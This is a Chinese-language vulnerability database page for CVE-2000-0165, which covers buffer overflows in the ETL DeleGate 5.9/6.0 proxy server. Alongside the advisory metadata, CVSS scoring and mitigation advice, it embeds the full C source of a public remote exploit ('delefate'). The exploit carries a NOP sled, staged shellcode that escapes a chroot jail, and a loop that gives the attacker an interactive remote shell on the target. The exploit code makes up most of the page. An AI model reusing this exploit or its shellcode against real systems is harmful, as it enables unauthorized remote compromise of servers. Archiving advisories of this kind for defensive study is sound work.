CVE-2000-0165
CVSS7.5
发布时间 :1999-11-13 00:00:00
修订时间 :2008-09-10 15:03:08
NMCOE    

[原文]The Delegate application proxy has several buffer overflows which allow a remote attacker to execute commands.


[CNNVD]ETL Delegate缓冲区溢出漏洞(CNNVD-199911-048)

        
        Delegate是ElectroTechnical Laboratory发布的代理服务器程序。
        Delegate存在许多没有进行缓冲区边界检查的漏洞,远程攻击者可以利用缓冲区溢出攻击在服务器上执行任意命令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:etl:delegate:6.0
cpe:/a:etl:delegate:5.9

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0165
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0165
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199911-048
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-02-15&msg=Pine.BSF.4.21.0002192249290.10784-100000@freefall.freebsd.org
(UNKNOWN)  FREEBSD  FreeBSD-SA-00:04
http://www.ciac.org/ciac/bulletins/k-023.shtml
(UNKNOWN)  CIAC  K-023

- 漏洞信息

ETL Delegate缓冲区溢出漏洞
高危 未知
1999-11-13 00:00:00 2005-05-02 00:00:00
远程  
        
        Delegate是ElectroTechnical Laboratory发布的代理服务器程序。
        Delegate存在许多没有进行缓冲区边界检查的漏洞,远程攻击者可以利用缓冲区溢出攻击在服务器上执行任意命令。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 暂时停止使用ETL Delegate。
        厂商补丁:
        ETL
        ---
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.delegate.org/delegate/

- 漏洞信息 (19634)

ETL Delegate 5.9 .x/6.0 .x Buffer Overflow Vulnerabilities (EDBID:19634)
linux remote
1999-11-13 Verified
0 scut
N/A [点击下载]
source: http://www.securityfocus.com/bid/808/info

The Delegate proxy server from ElectroTechnical Laboratory has numerous (several hundred, according to the orignal poster) unchecked buffers that could be exploited to remotely compromise the server.

/* delefate.c
 * delegate 5.9.x - 6.0.x remote exploit
 *
 * public
 *
 * will open a shell with the privileges of the nobody user.
 *
 * 1999/13/11 by scut of teso [http://teso.scene.at/]
 *
 * word to whole team teso, ADM, w00w00, beavuh and stealth :).
 * special thanks to xdr for donating a bit of his elite debugging skillz.
 */

#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <netdb.h>


#define	XP_OFFSET		0xbfffe074	/* offset */
unsigned long int		xp_off = XP_OFFSET;

/* you don't have to modify this :) i hope :)
 */
#define	XP_NETWORK_FD		12
#define	XP_NETWORK_OFFSET	0x00000101	/* fixed relative network socket offset */
#define	XP_SHELLCODE_OFFSET	0x00000104	/* fixed relative retaddr offset */
#define	XP_DIFF			0x0000000e	/* 14 bytes after XP_OFFSET starts the shellcode */

#define	XP_SH2_FD1		0x00000011
#define	XP_SH2_FD2		0x0000001d
#define	XP_SH2_FD3		0x0000002a


#define	GREEN	"\E[32m"
#define	BOLD	"\E[1m"
#define	NORMAL	"\E[m"
#define	RED	"\E[31m"

/* local functions
 */
void			usage (void);
void			shell (int socket);
unsigned long int	net_resolve (char *host);
int			net_connect (struct sockaddr_in *cs, char *server,
	unsigned short int port, int sec);


/* because the buffer is rather small (256 bytes), we use a minimalistic
 * read() shellcode to increase the chances to hit a correct offet
 */
unsigned char	shellcode1[] =
	"\x77\x68\x6f\x69\x73\x3a\x2f\x2f\x61\x20\x62\x20\x31\x20\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90"

	/* 30 byte read() shellcode by scut */
	"\x33\xd2\x33\xc0\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x80\xc2"
	"\x10\x03\xca\xc1\xc2\x04\xb0\x03\x33\xdb\xb3\x0c\xcd\x80"
						/*     ^^ network fd */
	"\x82\xe0\xff\xbf"	/* return address */

	"\x0d\x0a";


/* uid+chroot-break+shell shellcode by lamerz, thanks !
 * slightly modified by scut to take care of the network socket
 */
unsigned char shellcode2[]=
	"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb\x89\xd9"
	"\xb3\x0c\xb0\x3f\xcd\x80\x31\xc0\x31\xdb\x89\xd9\xb3\x0c\x41\xb0"
	"\x3f\xcd\x80\x31\xc0\x31\xdb\x89\xd9\xb3\x0c\x41\x41\xb0\x3f\xcd"
	"\x80\x31\xc0\x31\xdb\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e"
	"\x31\xc0\x31\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\x01\xb0\x27"
	"\xcd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31\xdb\x8d"
	"\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d\x5e\x08\xb0\x0c"
	"\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46\x09\x8d\x5e\x08\xb0\x3d"
	"\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46\x07"
	"\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b"
	"\xcd\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\x30"
	"\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31\x76\x6e\x67";


void
usage (void)
{
	printf (GREEN BOLD "delefate - delegate 5.9.x, 6.0.x remote" NORMAL "\n"
		"by " BOLD "scut" NORMAL " of " RED BOLD "team teso" NORMAL "\n\n"

		"usage.... : ./delefate <host> <port> [offset-add]\n"
		"example.. : ./delefate localhost 8080 -100\n\n"
		"for brute forcing, try from -2000 to 500 in steps of 200\n\n");

	exit (EXIT_FAILURE);
}

int
main (int argc, char **argv)
{
	int			socket;
	char			*server;
	struct sockaddr_in	sa;
	unsigned short int	port_dest;
	unsigned char		*retaddr_ptr;
	unsigned long int	offset;
	unsigned char		*stack = NULL;

	if (argc < 3)
		usage ();

	printf (GREEN BOLD "delefate 5.9.x - 6.0.x remote exploit" NORMAL "\n"
		"by " BOLD "scut" NORMAL " of " RED BOLD "team teso" NORMAL "\n\n");

	if (argc == 4) {
		long int	xp_add = 0;

		if (sscanf (argv[3], "%ld", &xp_add) != 1) {
			usage ();
		}
		xp_off += xp_add;
	}
	printf (" " GREEN "-" NORMAL " using offset 0x%08x\n", xp_off);

	server = argv[1];
	port_dest = atoi (argv[2]);

	/* do the offset
	 */
	retaddr_ptr = shellcode1 + XP_SHELLCODE_OFFSET;
	offset = xp_off + XP_DIFF;
	*retaddr_ptr				= (offset & 0x000000ff) >>  0;
	*(retaddr_ptr + 1)			= (offset & 0x0000ff00) >>  8;
	*(retaddr_ptr + 2)			= (offset & 0x00ff0000) >> 16;
	*(retaddr_ptr + 3)			= (offset & 0xff000000) >> 24;
	*(shellcode1 + XP_NETWORK_OFFSET)	= (unsigned char) XP_NETWORK_FD;
	*(shellcode2 + XP_SH2_FD1)		= (unsigned char) XP_NETWORK_FD;
	*(shellcode2 + XP_SH2_FD2)		= (unsigned char) XP_NETWORK_FD;
	*(shellcode2 + XP_SH2_FD3)		= (unsigned char) XP_NETWORK_FD;

	printf (" " GREEN "-" NORMAL " connecting to " GREEN "%s:%hu" NORMAL "...", server, port_dest);
	fflush (stdout);

	socket = net_connect (&sa, server, port_dest, 45);
	if (socket <= 0) {
		printf (" " RED BOLD "failed" NORMAL ".\n");
		perror ("net_connect");
		exit (EXIT_FAILURE);
	}
	printf (" " GREEN BOLD "connected." NORMAL "\n");

	/* send minimalistic read() shellcode */
	printf (" " GREEN "-" NORMAL " sending first shellcode...\n");
	write (socket, shellcode1, strlen (shellcode1));
	sleep (1);

	/* now send the real shellcode :-) */
	printf (" " GREEN "-" NORMAL " sending second shellcode...\n");
	write (socket, shellcode2, strlen (shellcode2));

	printf (" " GREEN "-" NORMAL " spawning shell...\n\n");
	shell (socket);
	close (socket);


	exit (EXIT_SUCCESS);
}

unsigned long int
net_resolve (char *host)
{
	long		i;
	struct hostent	*he;

	i = inet_addr (host);
	if (i == -1) {
		he = gethostbyname (host);
		if (he == NULL) {
			return (0);
		} else {
			return (*(unsigned long *) he->h_addr);
		}
	}

	return (i);
}


/* original version by typo, modified by scut
 */

void
shell (int socket)
{
	char	io_buf[1024];
	int	n;
	fd_set	fds;

	while (1) {
		FD_SET (0, &fds);
		FD_SET (socket, &fds);

		select (socket + 1, &fds, NULL, NULL, NULL);
		if (FD_ISSET (0, &fds)) {
			n = read (0, io_buf, sizeof (io_buf));
			if (n <= 0)
				return;
			write (socket, io_buf, n);
		}

		if (FD_ISSET (socket, &fds)) {
			n = read (socket, io_buf, sizeof (io_buf));
			if (n <= 0)
				return;
			write (1, io_buf, n);
		}
	}
}


int
net_connect (struct sockaddr_in *cs, char *server,
	unsigned short int port, int sec)
{
	int		n, len, error, flags;
	int		fd;
	struct timeval	tv;
	fd_set		rset, wset;

	/* first allocate a socket */
	cs->sin_family = AF_INET;
	cs->sin_port = htons (port);
	fd = socket (cs->sin_family, SOCK_STREAM, 0);
	if (fd == -1)
		return (-1);

	cs->sin_addr.s_addr = net_resolve (server);
	if (cs->sin_addr.s_addr == 0) {
		close (fd);
		return (-1);
	}

	flags = fcntl (fd, F_GETFL, 0);
	if (flags == -1) {
		close (fd);
		return (-1);
	}
	n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
	if (n == -1) {
		close (fd);
		return (-1);
	}

	error = 0;

	n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
	if (n < 0) {
		if (errno != EINPROGRESS) {
			close (fd);
			return (-1);
		}
	}
	if (n == 0)
		goto done;

	FD_ZERO(&rset);
	FD_ZERO(&wset);
	FD_SET(fd, &rset);
	FD_SET(fd, &wset);
	tv.tv_sec = sec;
	tv.tv_usec = 0;

	n = select(fd + 1, &rset, &wset, NULL, &tv);
	if (n == 0) {
		close(fd);
		errno = ETIMEDOUT;
		return (-1);
	}
	if (n == -1)
		return (-1);

	if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
		if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
			len = sizeof(error);
			if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
				errno = ETIMEDOUT;
				return (-1);
			}
			if (error == 0) {
				goto done;
			} else {
				errno = error;
				return (-1);
			}
		}
	} else
		return (-1);

done:
	n = fcntl(fd, F_SETFL, flags);
	if (n == -1)
		return (-1);

	return (fd);
}

		

- 漏洞信息

1140
DeleGate Data Receiving Buffer Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

1999-11-13 Unknow
1999-11-13 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站